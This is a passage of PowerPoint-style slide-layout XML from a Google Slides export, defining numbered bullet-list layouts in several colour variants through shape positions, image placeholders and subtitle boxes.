            <a:off x="429768" y="4078298"/>
            <a:ext cx="785566" cy="6069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35. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 693"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p48"/>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4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96" name="Google Shape;696;p4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697" name="Google Shape;697;p4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698" name="Google Shape;698;p4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699" name="Google Shape;699;p4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00" name="Google Shape;700;p4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1" name="Google Shape;701;p48"/>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2" name="Google Shape;702;p48"/>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48"/>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48"/>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48"/>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48"/>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48"/>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8" name="Google Shape;708;p48"/>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09" name="Google Shape;709;p48"/>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0" name="Google Shape;710;p48"/>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11" name="Google Shape;711;p48"/>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12" name="Google Shape;712;p48"/>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13" name="Google Shape;713;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="714" name="Google Shape;714;p48"/>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15" name="Google Shape;715;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="716" name="Google Shape;716;p48"/>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17" name="Google Shape;717;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>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36. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 718"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Google Shape;719;p49"/>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4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1" name="Google Shape;721;p4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22" name="Google Shape;722;p4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23" name="Google Shape;723;p4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24" name="Google Shape;724;p4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25" name="Google Shape;725;p4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6" name="Google Shape;726;p49"/>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27" name="Google Shape;727;p49"/>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49"/>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49"/>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49"/>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49"/>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49"/>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3" name="Google Shape;733;p49"/>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4" name="Google Shape;734;p49"/>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5" name="Google Shape;735;p49"/>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36" name="Google Shape;736;p49"/>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37" name="Google Shape;737;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="738" name="Google Shape;738;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="739" name="Google Shape;739;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="740" name="Google Shape;740;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="741" name="Google Shape;741;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="742" name="Google Shape;742;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577804"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37. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 743"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Google Shape;744;p50"/>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0"/>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46" name="Google Shape;746;p50"/>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47" name="Google Shape;747;p50"/>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48" name="Google Shape;748;p5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49" name="Google Shape;749;p50"/>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50" name="Google Shape;750;p50"/>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1" name="Google Shape;751;p50"/>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2" name="Google Shape;752;p50"/>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0"/>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0"/>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0"/>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0"/>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0"/>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8" name="Google Shape;758;p50"/>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59" name="Google Shape;759;p50"/>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0" name="Google Shape;760;p50"/>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61" name="Google Shape;761;p50"/>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62" name="Google Shape;762;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="763" name="Google Shape;763;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="764" name="Google Shape;764;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="765" name="Google Shape;765;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="766" name="Google Shape;766;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="767" name="Google Shape;767;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="176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38. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 768"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Google Shape;769;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141275" y="123782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1"/>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1" name="Google Shape;771;p51"/>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72" name="Google Shape;772;p51"/>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73" name="Google Shape;773;p5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74" name="Google Shape;774;p51"/>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775" name="Google Shape;775;p51"/>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6" name="Google Shape;776;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="12746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77" name="Google Shape;777;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="182890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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="24199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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="30110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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141275" y="3602150"/>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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141350" y="4193275"/>
            <a:ext cx="7728300" cy="486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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="184885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3" name="Google Shape;783;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12200" y="24399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4" name="Google Shape;784;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="30310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5" name="Google Shape;785;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="3622100"/>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86" name="Google Shape;786;p51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="4236125"/>
            <a:ext cx="9168600" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1417300"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787" name="Google Shape;787;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="788" name="Google Shape;788;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="Google Shape;789;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="790" name="Google Shape;790;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="791" name="Google Shape;791;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="792" name="Google Shape;792;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="465" b="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4203272"/>
            <a:ext cx="577805" cy="446400"/>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39. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 793"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Google Shape;794;p52"/>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52"/>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796" name="Google Shape;796;p52"/>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797" name="Google Shape;797;p52"/>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798" name="Google Shape;798;p52"/>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799" name="Google Shape;799;p52"/>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00" name="Google Shape;800;p52"/>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1" name="Google Shape;801;p52"/>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2" name="Google Shape;802;p52"/>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52"/>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4" name="Google Shape;804;p52"/>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52"/>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6" name="Google Shape;806;p52"/>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52"/>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08" name="Google Shape;808;p52"/>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52"/>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0" name="Google Shape;810;p52"/>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52"/>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12" name="Google Shape;812;p52"/>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52"/>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14" name="Google Shape;814;p52"/>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15" name="Google Shape;815;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="816" name="Google Shape;816;p52"/>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17" name="Google Shape;817;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1037"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="818" name="Google Shape;818;p52"/>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19" name="Google Shape;819;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1390"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520980" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="820" name="Google Shape;820;p52"/>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40. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 821"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;p53"/>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53"/>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4" name="Google Shape;824;p53"/>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25" name="Google Shape;825;p53"/>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26" name="Google Shape;826;p53"/>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27" name="Google Shape;827;p53"/>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28" name="Google Shape;828;p53"/>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29" name="Google Shape;829;p53"/>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0" name="Google Shape;830;p53"/>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53"/>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2" name="Google Shape;832;p53"/>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53"/>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4" name="Google Shape;834;p53"/>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53"/>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6" name="Google Shape;836;p53"/>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53"/>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38" name="Google Shape;838;p53"/>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53"/>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40" name="Google Shape;840;p53"/>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53"/>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42" name="Google Shape;842;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1171588"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="843" name="Google Shape;843;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="844" name="Google Shape;844;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2205600"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="845" name="Google Shape;845;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="846" name="Google Shape;846;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3277788"/>
            <a:ext cx="521208" cy="396118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="847" name="Google Shape;847;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3794760"/>
            <a:ext cx="520979" cy="393192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="848" name="Google Shape;848;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4343400"/>
            <a:ext cx="520979"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41. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
